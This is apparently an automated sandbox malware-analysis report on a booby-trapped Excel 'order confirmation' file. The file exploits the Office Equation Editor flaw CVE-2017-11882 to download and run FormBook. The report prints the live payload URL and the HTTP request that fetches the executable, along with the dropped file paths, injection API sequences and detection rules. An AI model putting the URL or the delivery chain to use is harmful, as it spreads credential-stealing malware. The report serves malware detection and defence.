Windows Analysis Report ORDERCONFIRMATION_00001679918.xlsx

Overview

General Information

Sample Name:	ORDERCONFIRMATION_00001679918.xlsx
Analysis ID:	491746
MD5:	9c34f5c5e1a78c24947c3fe5fce601ea
SHA1:	727aa4c09c4c4f40d47ba87fa91921876b79f0f3
SHA256:	ff1168daa5edebf6c75a6f24573e0b1e8153156b47e9c91712f8aa7968d745db
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Injects a PE file into a foreign processes

Sigma detected: Execution from Suspicious Folder

Office equation editor drops PE file

Machine Learning detection for dropped file

Drops PE files to the user root directory

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Contains functionality to call native functions

Downloads executable code via HTTP

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Office Equation Editor has been started

Checks if the current process is being debugged

Drops PE files to the user directory

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Signatures

AV Detection:

Multi AV Scanner detection for submitted file

Source: ORDERCONFIRMATION_00001679918.xlsx	Virustotal: Detection: 30%			Perma Link
Source: ORDERCONFIRMATION_00001679918.xlsx	ReversingLabs: Detection: 28%

Yara detected FormBook

Source: Yara match

File source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: http://23.94.159.204/poc/vbc.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: http://23.94.159.204/poc/vbc.exe

Virustotal: Detection: 11%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Virustotal: Detection: 42%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	ReversingLabs: Detection: 20%
Source: C:\Users\user\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dll	Virustotal: Detection: 15%	Perma Link
Source: C:\Users\Public\vbc.exe	Virustotal: Detection: 42%	Perma Link
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 20%

Machine Learning detection for dropped file

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dll	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 4.2.vbc.exe.2770000.4.unpack	Avira: Label: W32/Delf.I
Source: 5.0.vbc.exe.1c0000.1.unpack	Avira: Label: W32/Delf.I
Source: 5.2.vbc.exe.1c0000.0.unpack	Avira: Label: TR/ATRAPS.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: wntdll.pdb source: vbc.exe, 00000004.00000003.465849366.000000000E750000.00000004.00000001.sdmp

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405EC2 FindFirstFileA,FindClose,	4_2_00405EC2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	4_2_004054EC
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00402671 FindFirstFileA,	4_2_00402671
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402671 FindFirstFileA,	5_2_00402671
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00405EC2 FindFirstFileA,FindClose,	5_2_00405EC2
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	5_2_004054EC

Software Vulnerabilities:

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 23.94.159.204:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 23.94.159.204:80

Networking:

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 27 Sep 2021 19:08:39 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/8.0.10Last-Modified: Mon, 27 Sep 2021 07:27:42 GMTETag: "46591-5ccf50857974b"Accept-Ranges: bytesContent-Length: 288145Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 30 28 81 e9 51 46 d2 e9 51 46 d2 e9 51 46 d2 2a 5e 19 d2 eb 51 46 d2 e9 51 47 d2 71 51 46 d2 2a 5e 1b d2 e6 51 46 d2 bd 72 76 d2 e3 51 46 d2 2e 57 40 d2 e8 51 46 d2 52 69 63 68 e9 51 46 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 6d 3a ff 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 00 00 00 84 02 00 00 04 00 00 2a 31 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 80 03 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 75 00 00 a0 00 00 00 00 70 03 00 e0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 7c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 66 5e 00 00 00 10 00 00 00 60 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a2 12 00 00 00 70 00 00 00 14 00 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 5d 02 00 00 90 00 00 00 06 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 70 03 00 00 0a 00 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /poc/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.94.159.204Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204

Source: vbc.exe, vbc.exe, 00000005.00000000.466883914.0000000000409000.00000008.00020000.sdmp, vbc.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: vbc.exe, 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.466883914.0000000000409000.00000008.00020000.sdmp, vbc.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vbc.exe, 00000004.00000002.467563721.0000000001CD0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.467563721.0000000001CD0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: F76D3143.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F76D3143.emf

Jump to behavior

Source: global traffic

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00404FF1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

4_2_00404FF1

E-Banking Fraud:

Yara detected FormBook

Source: Yara match

File source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Yara signature match

Source: 5.0.vbc.exe.1c0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 4.2.vbc.exe.2770000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 4.2.vbc.exe.2770000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.1c0000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.2.vbc.exe.1c0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000005.00000000.466845988.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000004.00000002.469258298.0000000002770000.00000004.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Contains functionality to shutdown / reboot the system

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		4_2_0040312A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		5_2_0040312A

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406354	4_2_00406354
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00404802	4_2_00404802
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406B2B	4_2_00406B2B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_73067500	4_2_73067500
Source: C:\Users\Public\vbc.exe	Code function: 4_2_7306BA78	4_2_7306BA78
Source: C:\Users\Public\vbc.exe	Code function: 4_2_7306BA87	4_2_7306BA87
Source: C:\Users\Public\vbc.exe	Code function: 4_2_7306754F	4_2_7306754F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00406354	5_2_00406354
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00404802	5_2_00404802
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00406B2B	5_2_00406B2B

Found potential string decryption / allocating functions

Source: C:\Users\Public\vbc.exe

Code function: String function: 00402A29 appears 51 times

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe

Code function: 4_2_7306BF13 CreateProcessW,NtQueryInformationProcess,VirtualAllocEx,CreateRemoteThread,SuspendThread,

4_2_7306BF13

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: ORDERCONFIRMATION_00001679918.xlsx	Virustotal: Detection: 30%
Source: ORDERCONFIRMATION_00001679918.xlsx	ReversingLabs: Detection: 28%

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$ORDERCONFIRMATION_00001679918.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE2EE.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@6/16@0/1

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00402053 CoCreateInstance,MultiByteToWideChar,

4_2_00402053

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_004042C1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

4_2_004042C1

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: wntdll.pdb source: vbc.exe, 00000004.00000003.465849366.000000000E750000.00000004.00000001.sdmp

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dll	Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
